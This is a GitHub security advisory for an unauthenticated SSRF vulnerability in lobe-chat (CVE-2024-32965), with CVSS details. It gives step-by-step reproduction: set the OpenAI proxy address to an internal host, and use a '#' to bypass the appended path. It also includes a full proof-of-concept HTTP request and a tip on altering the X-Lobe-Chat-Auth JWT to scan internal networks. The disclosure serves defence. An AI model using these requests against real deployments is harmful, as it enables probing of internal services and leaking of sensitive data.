Skip to content

【high】ssrf vulnerability in lobe-chat 1

High
arvinxx published GHSA-2xcc-vm3f-m8rw Nov 26, 2024

Package

No package listed

Affected versions

<= v0.150.1

Patched versions

1.19.13

Description

Summary

The latest version of lobe-chat(by now v0.141.2) has an unauthorized ssrf vulnerability. An attacker can construct malicious requests to cause SSRF without logging in, attack intranet services, and leak sensitive information.

Details

  • visit https://chat-preview.lobehub.com/
  • click settings -> llm -> openai
  • fill the OpenAI API Key you like
  • fill the proxy address that you want to attack (e.g. a domain that resolved to a local ip addr like 127.0.0.1.xip.io) (the address will concat the path "/chat/completions" which can be bypassed with sharp like "http://172.23.0.1:8000/#")
  • then lobe will echo the ssrf result below :)

The jwt token header X-Lobe-Chat-Auth strored proxy address and OpenAI API Key, you can modify it to scan internal network in your target lobe-web.

image

image

image

PoC

POST /api/chat/openai HTTP/2
Host: chat-preview.lobehub.com
Cookie: LOBE_LOCALE=zh-CN; LOBE_THEME_PRIMARY_COLOR=undefined; LOBE_THEME_NEUTRAL_COLOR=undefined; _ga=GA1.1.86608329.1711346216; _ga_63LP1TV70T=GS1.1.1711346215.1.1.1711346244.0.0.0
Content-Length: 158
Sec-Ch-Ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
X-Lobe-Chat-Auth: eyJhbGciOiJIUzI1NiJ9.eyJhY2Nlc3NDb2RlIjoiIiwiYXBpS2V5IjoiMSIsImVuZHBvaW50IjoiaHR0cDovLzEyNy4wLjAuMS54aXAuaW86MzIxMCIsImlhdCI6MTcxMTM0NjI1MCwiZXhwIjoxNzExMzQ2MzUwfQ.ZZ3v3q9T8E6llOVGOA3ep5OSVoFEawswEfKtufCcwL4
Content-Type: application/json
X-Lobe-Trace: eyJlbmFibGVkIjpmYWxzZX0=
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Origin: https://chat-preview.lobehub.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://chat-preview.lobehub.com/settings/llm
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7
Connection: close

{"model":"gpt-3.5-turbo","stream":true,"frequency_penalty":0,"presence_penalty":0,"temperature":0.6,"top_p":1,"messages":[{"content":"hello","role":"user"}]}

Impact

SSRF ,All users will be impacted.

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
High
Privileges required
None
User interaction
None
Scope
Changed
Confidentiality
High
Integrity
Low
Availability
Low

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:L/A:L

CVE ID

CVE-2024-32965

Weaknesses

No CWEs

Credits